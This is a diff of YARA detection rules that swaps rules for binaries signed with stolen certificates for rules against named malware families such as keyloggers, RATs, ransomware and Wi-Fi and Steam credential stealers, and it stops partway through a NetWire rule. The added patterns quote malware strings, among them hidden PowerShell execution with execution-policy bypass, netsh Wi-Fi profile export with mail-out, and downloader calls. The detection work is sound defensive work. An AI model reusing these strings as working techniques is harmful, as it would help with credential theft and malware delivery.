-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OSIRIS Corporation" and pe.signatures [ i ] . serial == "b5:48:76:5e:eb:e9:46:83:48:af:40:b9:89:1c:1e:63" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4697C7Ddd3E37Fe275Fdc6961A9093E3 : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known unamed malicious executables, mostly DLLs"
 		author = "ditekSHen"
-		id = "9d611fee-cf29-523e-86f7-5c67f0e563a9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3c16df71-f2e2-591c-b377-7e5ed697d43f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6773-L6785"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4562-L4575"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3de1a753ac7a2f43ae64ee54fc81d92f70c32d4a04398a6dfc9a6ec856d8300"
+		logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef24ae3635929c371d1427901082be9f76e58d9a"
-		hash1 = "fb3f622cf5557364a0a3abacc3e9acf399b3631bf3630acb8132514c486751e7"
-		importance = 20
+
+	strings:
+		$s1 = "\\wmkawe_%d.data" ascii
+		$s2 = "\\resmon.resmoncfg" ascii
+		$s3 = "ByPassUAC" fullword ascii
+		$s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase
+		$s5 = "%s\\SbieMsg." ascii
+		$s6 = "Stupid Japanese" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xC3\\x89tienne Hill" and pe.signatures [ i ] . serial == "46:97:c7:dd:d3:e3:7f:e2:75:fd:c6:96:1a:90:93:e3" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_74C94Ef697Dc9783F845D26Dccc1E7Fd : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known unamed malicious executables"
 		author = "ditekSHen"
-		id = "3cd08af1-8999-59a8-a679-a39871ecf68e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6787-L6799"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4577-L4591"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "226dfe366c31e9cb38910df7d6cb2037c545745594fd133d7b7359175f153a90"
+		logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "6daa64d7af228de45ded86ad4d1aeaa360295f56"
-		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
-		importance = 20
+
+	strings:
+		$s1 = "{%s-%d-%d}" fullword wide
+		$s2 = "update" fullword wide
+		$s3 = "https://" fullword wide
+		$s4 = "http://" fullword wide
+		$s5 = "configure" fullword ascii
+		$s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 }
+		$s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CIBIKART d.o.o." and pe.signatures [ i ] . serial == "74:c9:4e:f6:97:dc:97:83:f8:45:d2:6d:cc:c1:e7:fd" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Dd1Cb148A90123Dcc13498B54E5A798 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent downloading encoded binaries in patches"
 		author = "ditekSHen"
-		id = "8bdc91bc-5a59-5c22-8d39-fe1bf4267813"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "00cb5184-b12d-5014-bee8-116cc72dfa47"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6801-L6812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4593-L4610"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b5ec1b9d3fd15259d3628b5199b274f85674b404c57329d8af4f779ae357454"
+		logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3a7c692345b67c7a2b21a6d94518588c8bbe514c"
-		importance = 20
+		snort2_sid = "920122"
+		snort3_sid = "920119"
+
+	strings:
+		$s1 = "totallist" fullword ascii wide
+		$s2 = "LINKS_HERE" fullword wide
+		$s3 = "[SPLITTER]" fullword wide
+		$var2_1 = "DownloadWeb" fullword ascii
+		$var2_2 = "WriteByte" fullword ascii
+		$var2_3 = "MemoryStream" fullword ascii
+		$var2_4 = "DownloadString" fullword ascii
+		$var2_5 = "WebClient" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "33adab6a2ixdac07i4cLb4ac05j6yG2ew95e" and pe.signatures [ i ] . serial == "5d:d1:cb:14:8a:90:12:3d:cc:13:49:8b:54:e5:a7:98" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 2 of ( $var2* ) ) or ( 4 of ( $var2* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A758504E7971869D0Aec2775Fffa03D5 : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell PoshKeylogger"
 		author = "ditekSHen"
-		id = "1ecfe521-0148-5a13-b23f-dd1b14b835ed"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a816d716-caeb-5f08-9043-29db531f9e7c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6814-L6829"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4612-L4627"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "08f52e96d1e93e2d406753fd0dee5d03501ac037ab022b710362b113eaae6239"
+		logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "646bbb3a37cc004bea6efcd48579d1a5776cb157"
-		hash1 = "3194e2fb68c007cf2f6deaa1fb07b2cc68292ee87f37dff70ba142377e2ca1fa"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "::GetKeyboardState" ascii
+		$s2 = "GetAsyncKeyState(" ascii
+		$s3 = "::MapVirtualKey(" ascii
+		$s4 = "::GetAsyncKeyState" ascii
+		$s5 = "Start-Sleep" ascii
+		$s6 = "send-mailmessage" ascii
+		$s7 = "[System.IO.File]::AppendAllText($" ascii
+		$s8 = "new-object Management.Automation.PSCredential $" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) )
+		6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F13A4F94Bf233525 : FILE
+rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FujinamaRAT"
 		author = "ditekSHen"
-		id = "1d048571-661e-5d7f-a255-f07b84069b20"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6831-L6845"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4629-L4645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29284d9ced0d5e6d587edc9727321cdc7bf5ce4ad8407d460afa7f1e6d1bcb90"
+		logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "974eb056bb7467d54aae25a908ce661dac59c786"
-		importance = 20
+		snort2_sid = "920124"
+		snort3_sid = "920121"
+
+	strings:
+		$s1 = "GetAsyncKeyState" fullword ascii
+		$s2 = "HTTP/1.0" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide
+		$s4 = "frmMain" fullword ascii
+		$s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii
+		$s6 = "VBA6.DLL" fullword ascii
+		$s7 = "t_save" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SocketOptionName" and ( pe.signatures [ i ] . serial == "f1:3a:4f:94:bf:23:35:25" or pe.signatures [ i ] . serial == "00:f1:3a:4f:94:bf:23:35:25" ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_119Acead668Bad57A48B4F42F294F8F0 : FILE
+rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Phorpiex variants"
 		author = "ditekSHen"
-		id = "d3f45ee1-134f-5b16-81f8-83405a5e3181"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e2d26c5f-939e-53e3-8730-622341d26273"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6847-L6858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4647-L4666"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bae9aed4f53059b2ec0de630f681bb157c148d9ad38be35dd8c1a74b19619077"
+		logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "11ff68da43f0931e22002f1461136c662e623366"
-		importance = 20
+
+	strings:
+		$s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase
+		$s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase
+		$s3 = "%s\\autorun.inf" fullword wide
+		$s4 = "svchost." wide
+		$s5 = "%ls\\%d%d" wide
+		$s6 = "bitcoincash:" ascii
+		$s7 = "%ls:*:Enabled:%ls" fullword wide
+		$s8 = "%s\\%s\\DriveMgr.exe" fullword wide
+		$s9 = "api.wipmania.com" ascii
+		$v1_1 = "%appdata%" fullword wide
+		$v1_2 = "(iPhone;" ascii
+		$v1_3 = "/tst.php" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $v1* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_21144343720267Ba42F586105Ff279De : FILE
+rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SystemBC"
 		author = "ditekSHen"
-		id = "54e4133f-4fb7-5f70-a4dc-77c6f8120d29"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6860-L6871"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4668-L4687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1eacebed0966ad5d78eb7e38d8b854d183f21a19a53bbcb57503e4271b2cc84"
+		logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "c56f79b4cc3a0e0894cd1e54facdf2db9d8ca62a"
-		importance = 20
+
+	strings:
+		$pwsh = "powershell" fullword ascii
+		$bitstansfer = "Start-BitsTransfer" ascii wide
+		$s1 = "GET %s HTTP/1" ascii
+		$s2 = "User-Agent:" ascii
+		$s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii
+		$s4 = "LdrLoadDll" fullword ascii
+		$v1 = "BEGINDATA" fullword ascii
+		$v2 = /HOST\d:/ ascii
+		$v3 = /PORT\d:/ ascii
+		$v4 = "TOR:" fullword ascii
+		$v5 = "Fwow64" fullword ascii
+		$v6 = "start" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Varta Blue Dynamic" and pe.signatures [ i ] . serial == "21:14:43:43:72:02:67:ba:42:f5:86:10:5f:f2:79:de" )
+		uint16( 0 ) == 0x5a4d and ( ( $pwsh and ( $bitstansfer or 2 of ( $s* ) ) ) or ( 5 of ( $v* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A3Cb8E964244768969B837Ca9981De68 : FILE
+rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HDLocker ransomware"
 		author = "ditekSHen"
-		id = "a9d74cc6-0d89-5de9-8f13-966455e49b9c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6873-L6884"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4689-L4703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d88c9ac03a4b3803b85c5ee30ad127aca43cbfc33d754bc42c15593f7294b1bc"
+		logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "5617114bc2a584532eba1dd9eb9d23108d1f9ea7"
-		importance = 20
+
+	strings:
+		$s1 = "HDLocker_" fullword ascii
+		$s2 = ".log" fullword ascii
+		$s3 = "Scripting.FileSystemObject" fullword ascii
+		$s4 = "Boot" fullword ascii
+		$s5 = "hellwdo" fullword ascii
+		$s6 = "blackmoon" fullword ascii
+		$s7 = "BlackMoon RunTime Error:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" or pe.signatures [ i ] . serial == "00:a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bd96F0B87Edca41E777507015B3B2775 : FILE
+rule DITEKSHEN_MALWARE_Win_Vovalex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Vovalex ransomware"
 		author = "ditekSHen"
-		id = "5ef0b542-01de-53ee-9a52-0a05bccccd22"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "967af585-8a91-5ed0-8400-a8a24d95fd12"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6886-L6900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4705-L4718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9906821de34bf6a20bfe1a4be81563a22b110bde68fbe36b491955c23d2dcc6"
+		logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "abfa72d4a78a9e63f97c90bcccb8f46f3c14ac52"
-		importance = 20
+
+	strings:
+		$s1 = "README.VOVALEX.txt" fullword ascii
+		$s2 = "\\src\\phobos\\std\\" ascii
+		$s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii
+		$s4 = "Failed to spawn process \"" fullword ascii
+		$s5 = "=== Bypassed ===" fullword ascii
+		$s6 = "If you don't know where to buy" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ООО \"СМ\"" and ( pe.signatures [ i ] . serial == "bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" or pe.signatures [ i ] . serial == "00:bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E41537B8Dd65670D6Eb01954Becacf1E : FILE
+rule DITEKSHEN_MALWARE_Win_Dharma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Dharma ransomware"
 		author = "ditekSHen"
-		id = "80ac0d4e-5865-562a-a4a1-fa02b6859bdb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6902-L6916"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4720-L4728"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94b7feb2d1ed8a7004599ac2018746bf43529f7cf7c4776fbdf21282013935c8"
+		logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "150ff604efa1e4868ea47c5d48244e57fa4b9196"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marketing Concept s.r.o." and ( pe.signatures [ i ] . serial == "e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" or pe.signatures [ i ] . serial == "00:e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_06808C5934Da036A1297A936D72E93D4 : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Cryptolocker ransomware variants (Betarasite)"
 		author = "ditekSHen"
-		id = "c75ae0da-e8b9-581f-bfde-f23b3b3f9d22"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6918-L6929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4730-L4752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "45840d354dcea86c38effc86b3b6f92540f32eab78286d51ff7f472618accb8b"
+		logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "efb70718bc00393a01694f255a28e30e9d2142a4"
-		importance = 20
+
+	strings:
+		$x1 = "CryptoLocker" fullword wide
+		$x2 = ".betarasite" fullword wide
+		$x3 = "CMSTPBypass" fullword ascii
+		$s1 = "CommandToExecute" fullword ascii
+		$s2 = "SetInfFile" fullword ascii
+		$s3 = "SchoolPrject1" ascii
+		$s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii
+		$s5 = "Encrypt" fullword ascii
+		$s6 = "Invalide Key! Please Try Again." fullword wide
+		$s7 = "RegAsm" fullword wide
+		$s8 = "Your key will be destroyed" wide
+		$s9 = "encrypted using RC4 and RSA-2048" wide
+		$c1 = "https://coinbase.com" fullword wide
+		$c2 = "https://localbictoins.com" fullword wide
+		$c3 = "https://bitpanda.com" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhaon Entertainment Inc" and pe.signatures [ i ] . serial == "06:80:8c:59:34:da:03:6a:12:97:a9:36:d7:2e:93:d4" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 2 of ( $x* ) and 5 of ( $s* ) ) or ( all of ( $c* ) and 1 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_97D50C7E3Ab45B9A441A37D870484C10 : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell PoshWiFiStealer"
 		author = "ditekSHen"
-		id = "54c391df-ea76-5944-aae6-63f44ec557e5"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "69ac123d-b746-57f1-a488-547f9a9cdd86"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6931-L6942"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4754-L4765"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2f535f66a4aabffff48f167ffcabcb366398e358eaafa2b3d67ee4c7ad19eb66"
+		logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "2e47ceb6593c9fdbd367da8b765090e48f630b33"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "netsh wlan export profile" ascii
+		$s2 = "Send-MailMessage" ascii
+		$u1 = "https://github.com/axel05869/Wifi-Grab" ascii
+		$u2 = "/exploitechx/wifi-password-extractor" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHENZHEN MINIWAN TECHNOLOGY CO. LTD." and pe.signatures [ i ] . serial == "97:d5:0c:7e:3a:b4:5b:9a:44:1a:37:d8:70:48:4c:10" )
+		all of ( $s* ) or all of ( $u* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0B2B192657B37632518B08A06E201381 : FILE
+rule DITEKSHEN_MALWARE_Win_Steamhook : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects potential Steam stealer"
 		author = "ditekSHen"
-		id = "917d2d66-f4b4-59b1-aeed-3b10c337d4b8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6944-L6955"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4767-L4781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "361005555e5d4b51c4538617c99fe668fca61ccc0c0847611e1423f69194999c"
+		logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ea017224c3b209abf53941cc4110e93af7ecc7b1"
-		importance = 20
+
+	strings:
+		$s1 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$s2 = "/steam/upload.php" ascii
+		$s3 = ".*?(ssfn\\d+)" fullword ascii
+		$s4 = "add cookie failed..." fullword ascii
+		$s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
+		$pdb1 = "\\SteamHook\\Install\\" ascii
+		$pdb2 = "\\SteamHook\\dll\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atomic Protocol Systems" and pe.signatures [ i ] . serial == "0b:2b:19:26:57:b3:76:32:51:8b:08:a0:6e:20:13:81" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $pdb* ) or ( 1 of ( $pdb* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00945Aaac27E7D6D810C0A542Bedd562A4 : FILE
+rule DITEKSHEN_MALWARE_Win_Netwire : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NetWire RAT"
 		author = "ditekSHen"
-		id = "5698130c-0696-5474-8b86-b6ba290d2822"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c215f449-c725-51da-8f5b-2619bc282b22"
+		date = "2024-11-01"
